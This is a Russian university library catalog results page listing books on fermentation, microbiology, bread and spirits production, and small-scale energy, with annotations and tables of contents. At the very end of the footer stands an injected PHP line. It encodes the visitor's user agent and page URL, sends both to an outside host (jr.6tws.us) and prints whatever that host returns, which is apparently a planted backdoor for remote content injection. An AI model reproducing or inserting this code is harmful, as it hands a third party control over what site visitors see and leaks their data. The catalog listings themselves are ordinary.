Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

38 пользователей


Зарегистрированных: 1 

Червяк Жанна Олеговна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БРОЖЕНИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 34
1. 
Алкогольное брожение в связи с другими энзимными процессами в дрожжевой клетке [Текст] / сост. Н. Н. Простосердов, 1910. - VIII,234,38 с. с.
Держатели документа (Информация об экземплярах) 
2. 
Малюга И. Причины порчи дерева в сооружениях и способы предохранения его от гниения [Текст] / И. Малюга, 1885. - 169 с. с.
Держатели документа (Информация об экземплярах) 

Анализ причин разложения дерева. Описание строения древесины. Сведения об условиях гниения дерева и выборе средств предохранения от порчи в зависимости от условий их применения.

3. 
Мельников Н.П. Производство спирта из мха, дерева, соломы, сена и т.п. и новый способ винокурения с минеральными кислотами [Текст] / Н. П. Мельников, 1880. - 48 с. с.
Держатели документа (Информация об экземплярах) 

Описание производства винокурения из мха (моховинокуренный завод), способов переработки мха на спирт, составе и качестве и качестве бражки из лишайников.

4. 
Машины и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. дипломир. специалистов "Пищевая инженерия": в 3 т. / под ред. В. А. Панфилова. Кн. 2 / С. Т. Антипов [и др.], 2009. - [845] с.
Держатели документа (Информация об экземплярах) 

В учебнике обобщены сведения о состоянии и перспективе технического обеспечения пищевых и перерабатывающих производств. Особое внимание уделено проблемам, стоящим перед специалистами в деле повышения эффективности машинных технологий продуктов питания. Представлены современные формы организации технологических комплексов, а также машинно-аппаратурные схемы линий для переработки сельхозсырья растительного и животного происхождения, а также морепродуктов в продукты питания. Изложены научные основы реализуемых процессов и инженерные расчеты важнейших характеристик машин и аппаратов. Описано оборудование для ведения механических, гидромеханических, тепломассообменных и биотехнологических процессов, а также для дозирования и упаковывания пищевых продуктов. Рассмотрены методы организации технического обслуживания и ремонта оборудования, приоритетные научные проблемы и инженерные задачи развития пищевых производств, вопросы организации создания новой техники.

5. 
Грин Растворимые ферменты и брожение [Текст] / Грин, 1908. - XIV,456 с. с.
Держатели документа (Информация об экземплярах) 
6. 
Маравин Л.Н. Разваривание сырья и брожение в спиртовом производстве [Текст] / Л. Н. Маравин, 1942. - 55 с. с.
Держатели документа (Информация об экземплярах) 
7. 
Матвеева И. В. Биотехнологические основы приготовления хлеба [Текст] / И. В. Матвеева, И. Г. Белявская, 2001. - 149 с.
Держатели документа (Информация об экземплярах) 
8. 
Апет Т. К. Хлеб и булочные изделия [Текст] / Т. К. Апет, З. Н. Пашук, 1997. - 319 с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ПРОИЗВОДСТВО ХЛЕБОПЕКАРНОЕ -- МУКА -- ДРОЖЖИ -- СОЛЬ ПОВАРЕННАЯ -- СОЛОД -- САХАР -- МЕД -- ПАТОКА -- МОЛОКО -- ЖИР -- МАСЛО -- ЯЙЦА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ТЕХНОЛОГИЯ ХЛЕБОПЕЧЕНИЯ -- ЗАМЕС ТЕСТА -- РАЗРЫХЛЕНИЕ ТЕСТА -- БРОЖЕНИЕ ТЕСТА -- ТЕСТО ПШЕНИЧНОЕ -- ТЕСТО РЖАНОЕ -- ПЕЧЬ ХЛЕБОПЕКАРНАЯ -- ХРАНЕНИЕ ХЛЕБА -- ЧЕРСТВЕНИЕ ХЛЕБА -- БОЛЕЗНИ ХЛЕБА -- ДЕФЕКТЫ ХЛЕБА -- ПЕКАРНЯ МАЛАЯ -- СОРТ ХЛЕБА -- ИЗДЕЛИЯ ДИЕТИЧЕСКИЕ -- ИЗДЕЛИЯ СДОБНЫЕ -- ХЛЕБ СДОБНЫЙ -- БУЛКИ СДОБНЫЕ -- ПИРОГ -- КАРАВАЙ -- ЛЕПЕШКА -- ПЛЮШКА -- ВАТРУШКА -- ПИРОЖКИ -- ВЫПЕЧКА ДОМАШНЯЯ
Держатели документа (Информация об экземплярах) 
9. 
Ост Г.Химическая технология [Текст]. Вып. 5 : Жиры, сахар, крахмал, целлюлоза, брожение / пер. под ред. и с доп. Л.М. Лялина, 1927. - 270 с. с.
Держатели документа (Информация об экземплярах) 
10. 
Теппер Е. З. Практикум по микробиологии [Текст] : учеб. пособие для студ. высш. учеб. заведений / Е. З. Теппер, В. К. Шильникова, Г. И. Переверзева, 2004. - 256 с.
11. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
12. 
Нетрусов, Александр Иванович. Микробиология [Текст] : учеб. для вузов по специальности "Биология" / А. И. Нетрусов, И. Б. Котова, 2006. - 349, [1] с.

В учебнике приведены современные сведения о систематике <прокариот>, их строении, регуляции <метаболизма>, освещены вопросы <наследственности>, <изменчивости>, экологии <микроорганизмов>, определения их численности и изучения активности в природе с помощью радиоизотопных методов. Представлены методы <отбора> <проб> <почвы>, <воды>, <воздуха>, <биологических> <образцов>, затронуты проблемы <загрязнения> природных <экосистем> и возможности <самоочищения>, рассмотрена роль микроорганизмов в эволюции <биосферы>, даны рекомендации по их практическому применению.

13. 
Основы современной малой энергетики [Текст] : учеб. пособие: в 3 т. / Э. П. Гужулев [и др.] ; ОмГТУ, Центр техн. безопасности и диагностики "Полисервис". Т. III, 2006. - 527 с.
Оглавление 
  • Охрана окружающей среды. Природоохранные технологии. - с.3
  • Экологические проблемы в теплоэнергетике. - с.3
  • Воздействие объектов теплоэнергетики на окружающую среду. - с.8
  • Структурная схема воздействия мини-ТЭЦ на окружающую природную среду. - с.8
  • Образование загрязняющих веществ в технологическом процессе ТЭО. котельных. - с.10
  • Объекты и характер непосредственного воздействия ТЭО. котельных на состав и физические свойства биосферы. - с.14
  • Вторичные процессы загрязнения окружающей среды при эксплуатации ТЭО. - с.16
  • Последствия воздействия ТЭО на человека и окружающие его компоненты экосистемы. - с.19
  • ТЭО и возможные нарушения здоровья человека. - с.20
  • Нормирование вредных выбросов в атмосферу для котельных установок. - с.25
  • Методы снижения загрязнения от воздействия ТЭО. - с.27
  • Нормативное обеспечение выбросов. - с.27
  • Техническое обеспечение снижения загрязнения атмосферного воздуха. - с.28
  • Очистка дымовых газов от оксидов азота. - с.45
  • Горелка с низким выбросом NO[[d]]x[[/d]]. - с.46
  • Ступенчатое сжигание топлива. - с.46
  • Рециркуляция дымовых газов. - с.48
  • Впрыск воды или водомазутной эмульсии в ядро факела. - с.49
  • Вторичные мероприятия по уменьшению выбросов NO[[d]]x[[/d]]. - с.51
  • Применение технологии DENOX компании «Хальдор Tonce АО» на российских электростанциях. - с.58
  • Электронно-лучевой способ очистки дымовых газов от NO[[d]]x[[/d]] и SO[[d]]2[[/d]]. - с.59
  • Оценка затрат и оптимизация технических решений, применяемых для снижения концентрации NO[[d]]2[[/d]] в дымовых газах энергетических котлов. - с.60
  • Снижение выбросов оксидов азота в газотурбинных и парогазовых установках электростанций. - с.63
  • Очистка дымовых газов от соединений серы. - с.67
  • Первые отечественные установки по очистке дымовых газов от соединений серы. - с.67
  • Мокроизвестняковый способ (МИС) очистки дымовых газов от SO[[d]]2[[/d]]. - с.68
  • Мокросухой способ очистки дымовых газов от SO[[d]]2[[/d]]. - с.68
  • Магнезитовый способ очистки дымовых газов от SO[[d]]2[[/d]]. - с.74
  • Аммиачно-сульфатный (АСС) и аммиачно-циклический (АЦС) способы очистки дымовых газов от SO[[d]]2[[/d]]. - с.75
  • Удаление серы с помощью технологии WSA, разработанной фирмой «Хальдор Tonce АО» . - с.76
  • Упрощенные малозатратные технологии сероочистки. - с.77
  • Сокращение выбросов парниковых газов в атмосферу. - с.82
  • Влияние углекислого газа на глобальное потепление климата на Земле . - с.82
  • Способы ограничения выброса углекислого газа в атмосферу от ТЭО. - с.86
  • Сточные воды теплоэнергообъектов (ТЭО). - с.91
  • Допустимые концентрации загрязняющих веществ в воде водоемов и условия спуска сточных вод в водоемы. - с.92
  • Нормирование содержания вредных веществ в сточных водах энергообъектов. - с.96
  • Характеристика сточных вод, загрязненных нефтью и нефтепродуктами. - с.100
  • Промывные воды. - с.104
  • Сточные воды водоподготовительных установок. - с.107
  • Сточные воды от химической очистки и консервации теплосилового оборудования. - с.112
  • Сточные воды системы гидрозолоудаления (ГЗУ). - с.118
  • Охрана водного бассейна и почвы от ЗШО. - с.122
  • Часть II. - с.127
  • Методы расчета токсичных выбросов в атмосферу с уходящими газами ТЭО . - с.127
  • Расчет выбросов твердых частиц. - с.132
  • Расчет выбросов мазутной золы (в перерасчете на ванадий). - с.133
  • Расчет выбросов оксидов серы SO[[d]]2[[/d]]. - с.135
  • Расчет выбросов монооксида углерода СО. - с.137
  • Расчет выбросов оксида азота NO[[d]]x[[/d]]. - с.141
  • Методика расчета выбросов бенз(а)пирена в атмосферу паровыми котлами электростанций РД 153-34.1-02.316-99. - с.157
  • Расчет концентрации бенз(а)пирена в уходящих газах котлов при сжигании мазута и природного газа. - с.157
  • Расчет концентрации бенз(а)пирена при сжигании твердого топлива. - с.159
  • Расчет выбросов бенз(а)пирена. - с.160
  • Расчет выбросов бенз(а)пирена при совместном сжигании разных топлив. - с.160
  • Контрольные вопросы. - с.166
  • Библиографический список. - с.168
  • Нетрадиционные возобновляемые источники энергии. - с.169
  • Краткий обзор нетрадиционной энергетики. - с.169
  • Состояние альтернативных преобразователей энергии в мире. - с.169
  • Состояние и перспективы использования нетрадиционных возобновляемых источников энергии в электроэнергетике России. - с.172
  • Контрольные вопросы к главе 1. - с.184
  • Глава вторая. - с.184
  • Энергия ветра. - с.184
  • Ветроэнергетика в России. - с.200
  • Минусы ветроэнергетики. - с.201
  • ВЭС с точки зрения экологии. - с.203
  • Применение ветровой энергии. - с.205
  • Устройство ветроэлектрической установки. - с.215
  • Контрольные вопросы к главе 2. - с.222
  • Глава третья. - с.222
  • Солнечная энергия. - с.222
  • Использование солнечной энергии. - с.230
  • Солнечные установки коммунально-бытового назначения. - с.250
  • Фотонный кнут. - с.257
  • Развитие солнечной энергии в России. - с.263
  • Контрольные вопросы к главе 3. - с.266
  • Геотермальная энергия. - с.266
  • Гидротермальные системы. - с.270
  • Горячие системы вулканического происхождения. - с.271
  • Системы с высоким тепловым потоком. - с.272
  • Геотермальные электростанции. - с.272
  • Геотермальная энергия - энергия будущего. - с.274
  • Геотермальная энергия - тепловая энергия земли. - с.275
  • Российские бинарные энерготехнологии. - с.276
  • Контрольные вопросы к главе 4. - с.280
  • Энергия биомассы. - с.280
  • Что такое биогаз?. - с.281
  • Практические советы. - с.285
  • Будущее - за биогазом. - с.286
  • Метановое брожение. - с.291
  • Биоэнергетические установки, производимые в России, и их краткие технические характеристики. - с.298
  • Контрольные вопросы к главе 5. - с.303
  • Энергия воды. - с.304
  • Использование водной энергии земли. - с.304
  • Энергия Мирового океана. - с.307
  • Биохимическая энергия. - с.314
  • Выгоды использования энергии океана. - с.317
  • Контрольные вопросы к главе 6. - с.320
  • Низкопотенциальные источники тепла (НИТ). - с.320
  • Насосы тепла. - с.320
  • Альтернативные системы теплоснабжения с использованием тепловых насосов. - с.321
  • Контрольные вопросы к главе 7. - с.325
  • Будущие источники знергии. - с.326
  • Энергия из космоса. - с.326
  • Термоядерная энергия. - с.328
  • Водородная экономика. - с.329
  • Заключение. - с.330
  • Контрольные вопросы к главе 8. - с.331
  • Методика расчетов для проектирования НВИЭ. - с.332
  • Проектирование солнечной энергии. - с.332
  • Проектирование пассивных систем солнечного отопления зданий. Исходные данные и объем проектирования. - с.332
  • Проектирование альтернативных систем солнечного горячего водоснабжения. - с.347
  • Проектирование систем геотермального теплоснабжения. - с.367
  • Общие сведения. - с.367
  • Выбор расчетных параметров. - с.367
  • Определение коэффициента эффективности геотермальной системы теплоснабжения. - с.369
  • Расчет и подбор отопительных приборов. - с.373
  • Открытые системы геотермального теплоснабжения. - с.375
  • Закрытые системы геотермального теплоснабжения. - с.377
  • Геотермальная система теплокладоснабжения с тепловыми насосами. - с.382
  • Комплексные геотермальные системы теплоснабжения. - с.383
  • Проектирование ветроэнергетических установок. - с.386
  • Исходные данные и объем проектирования. - с.396
  • Общие сведения. - с.397
  • Выбор месторасположения установки и расчетных параметров. - с.398
  • Расчет ветродвигательных установок. - с.399
  • Проектирование аккумуляторов теплоты. - с.405
  • Общие сведения. - с.405
  • Расчет основных показателей ТАМ. - с.407
  • Проектирование биогазовых установок. - с.410
  • Общие сведения. - с.410
  • Биоэнергетические установки и заводы. - с.413
  • Методика расчета биогазовых установок. - с.415
  • Библиографический список. - с.422
  • Энергосбережение. - с.423
  • Общее представление. - с.423
  • Энергосберегающие технологии и оборудование в теплоэнергетике. - с.431
  • Эффективность реконструкции пароводогрейной котельной в мини-ТЕЦ. - с.471
  • Региональный опыт энергосбережения. Опыт ввода в эксплуатацию ТЭЦ малой мощности на предприятии ОАО «Техуглерод». - с.479
  • Экономические факторы и условия эксплуатации газотурбинных электростанций. - с.483
  • Описание и технико-экономические характеристики ГТЭС-12 МВт в ЗАО «ПОЛИСТИРОЛ». - с.499
  • Основные замечания, не предусмотренные при оценке применения газотурбинных установок в энергетике . - с.506
  • Комплексный подход к энергосбережению. - с.510
  • Заключение. - с.518
  • Контрольные вопросы. - с.519
  • Библиографический список. - с.520
Держатели документа (Информация об экземплярах) 

В третьем томе рассмотрены три раздела: <Охрана> <окружающей> <среды> и <природоохранные> <технологии>; <нетрадиционные> <возобновляемые> <источники> <энергии>; <энергосбережение>.

Отражены основные направления по повышению <экологической> <безопасности> теплоэнергетических объектов, включая вопросы по защите воздушного и водного бассейнов и окружающей среды. Основное внимание уделяется рассмотрению новых и перспективных технологий, на базе которых будет возможно создание экологически безопасной энергетики. Наряду с техническими и технологическими решениями в работе приведены технико-экономические оценки и показатели, связанные с реализацией мероприятий, направленных на защиту окружающей среды.

Представленный материал основан на последних научно-технических публикациях из современных теплоэнергетических учебно-методических изданий.

Полный текст
14. 
Гусев, Михаил Викторович. Микробиология [Текст] : Учеб. для вузов по направлению 510600 "Биология" и биол. специальностям / М. В. Гусев, 2004. - 461, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник является классическим университетским учебником, написанным известными учеными МГУ (1-е изд. -1978 г.). Он содержит основные сведения о <прокариотных> <микроорганизмах>: строении и химическом составе <клетки>, особенностях энергетического и конструктивного <метаболизма>, путях <обмена> <генетической> <информацией>, проблемах <систематики>. Подчеркнуто многообразие форм жизни на уровне ее прокариотной организации. На современном материале прослежено представление о том, что в основе прогрессивной <эволюции> прокариот лежит совершенствование способов получения ими энергии. В третьем (1992) и четвертом (2003) изданиях в целом сохранена логика изложения материала, присущая предыдущим изданиям, отдельные главы подверглись существенной переработке, что продиктовано успехами, достигнутыми в изучении некоторых групп прокариот за последний период. Большое внимание уделено группе <архебактерий>, выделена и охарактеризована группа <метилотрофных> <бактерий>. Принципы систематики прокариот изложены в соответствии с данными последнего, IX, издания Определителя бактерий <Берги>.

15. 
Азарова, Ольга Петровна. Основы микробиологии и биотехнологии [Текст] : учеб. пособие. Ч. 1, 2008. - 49 с.
Оглавление 
  • Введение. - с.3
  • Микроорганизмы превращений соединений серы (табл. 1). - с.5
  • Микроорганизмы превращения соединений фосфора (табл. 2). - с.7
  • Хемоорганогетеротрофы (табл. 3). - с.10
  • Микроорганизмы спиртового брожения (табл. 4а). - с.12
  • Микроорганизмы спиртового брожения (табл. 4б). - с.14
  • Микроорганизмы спиртового брожения (табл. 4в). - с.15
  • Микроорганизмы аммонификации белковых веществ (аэробы) (табл. 5). - с.16
  • Микроорганизмы разложения целлюлозы (табл. 6). - с.18
  • Микроорганизмы окисления углеводородов (табл. 7). - с.23
  • Микроорганизмы процесса нитрификации (табл. 8). - с.25
  • Микроорганизмы окисления жиров (табл. 9). - с.27
  • Микроорганизмы окисления этилового спирта в уксусную кислоту (табл. 10). - с.33
  • Микроорганизмы маслянокислого брожения (табл. 11). - с.34
  • Микроорганизмы гнилостного разложения (табл. 12). - с.37
  • Приложение. - с.40
  • Библиографический список. - с.47
Держатели документа (Информация об экземплярах) 

Содержит систематизированные и обработанные данные относительно морфологических, культуральных и биохимических характеристик основных видов микроорганизмов, участвующих в круговороте веществ в природе и в наиболее распространенных биотехнологических процессах.

может использоваться в качестве опорных конспектов по темам "Морфология, систематика и физиология микроорганизмов. Морфология и размножение микроорганизмов", а также в качестве справочного материала при выполнении лабораторного практикума по курсу "Основы микробиологии и биотехнологии".

Полный текст
16. 
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" : в 3 ч. Ч. 3 : Биохимические и физико-химические основы / В. Е. Куцакова [и др.], 2011. - 269, [1] с.
Держатели документа (Информация об экземплярах) 

В третьей части учебника рассмотрены биохимические процессы, происходящие в продуктах животного и растительного происхождения при охлаждении, замораживании, холодильном хранении и отеплении. Рассмотрены химический состав и строение тканей животного и растительного происхождения, процессы дыхания и брожения в продуктах растительного происхождения и автолитические процессы в тканях животного происхождения. Дан анализ влияния скорости протекания биохимических процессов на качество конечных продуктов.

17. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
18. 
Римарева, Любовь Вячеславовна. Теоретические и практические основы биотехнологии дрожжей [Текст] : учеб. пособие для вузов по специальности 260204 "Технология бродильных производств и виноделие" направления подгот. дипломир. специалиста 260200 "Производство продуктов питания из растительного сырья" / Л. В. Римарева, 2010. - 251 с.
Держатели документа (Информация об экземплярах) 

В настоящее время открываются широкие перспективы эффективного использования дрожжевых культур в различных биотехнологических процессах при производстве спирта, пива, вина, кваса, хлеба, пищевого белка, биологически активных пищевых добавок. В учебнике представлены теоретические и практические основы биотехнологии спиртовых дрожжей, даются основные представления о современных методах получения активных рас дрожжей, обладающих новыми морфолого-физиологическими и культурными свойствами. В книге обобщены достижения современной науки в области биологии, ферментологии и микробиологии дрожжевой клетки. Подробно освещены все этапы промышленного производства и применения дрожжей в спиртовой отрасли, а также ферментных препаратов для биокатализа полимеров зернового сырья в процессе приготовления зернового сусла для генерации дрожжей и спиртового брожения. Особое внимание уделено вопросам совершенствования биотехнологических процессов спиртового производства, качеству зернового сырья и способам ферментативной обработки в зависимости от вида зерновой культуры.

19. 
Миттова, Ирина Яковлевна. История химии с древнейших времен до конца ХХ века [Текст] : учеб. пособие для вузов по специальности ВПО 020900 "Химия, физика и механика материалов": в 2 т. Т. 1, 2012. - 411 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии в углубленном изложении представлены основные темы учебного лекционного курса "История и методология химии" Авторы рассматривают эволюцию химических знаний с древнейших времен до наших дней.

Особое внимание в книге уделено анализу развития и становления фундаментальных концепций химической теории; детально прослеживается сложный и длительный переход от античного атомизма к современным учениям о строении вещества.

Первый том пособия посвящен важнейшим событиям в истории химии классического периода. В нем рассмотрен вклад крупнейших ученых и философов в процесс формирования основных научных понятий и теоретических представлений с древности до 60-х гг. XIX столетия.

Издание содержит большое количество иллюстраций, способствующих более наглядной реконструкции описываемых событий, а также краткие биографии наиболее видных ученых-химиков и мыслителей древности.

20. 
Гусев, Михаил Викторович. Микробиология [Текст] : Учеб. для вузов по направлению 510600 "Биология" и биол. специальностям / М. В. Гусев, Л. А. Минеева, 2003. - 461, [1] с.

В учебнике (1-е изд. - 1978 г.) изложены основные сведения о <прокариотных> <микроорганизмах>: строении и химическом составе <клетки>, особенностях энергетического и конструктивного <метаболизма>, путях обмена генетической информацией, проблемах <систематики>. Подчеркнуто многообразие форм жизни на уровне прокариотной организации. На современном материале прослежено представление о том, что в основе прогрессивной эволюции прокариот лежит совершенствование способов получения ими энергии. В третьем издании (1992) в целом сохранена логика изложения материала, присущая предыдущим изданиям, отдельные главы подверглись существенной переработке, что продиктовано успехами, достигнутыми в изучении некоторых групп прокариот за последний период. Большое внимание уделено группе <архебактерий>, выделена и охарактеризована группа <метилотрофных> <бактерий>. Принципы систематики прокариот изложены в соответствии с данными последнего, IX, издания Определителя бактерий <Берги>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2873 - 22.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.15 с.12 запросов, 0.48c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;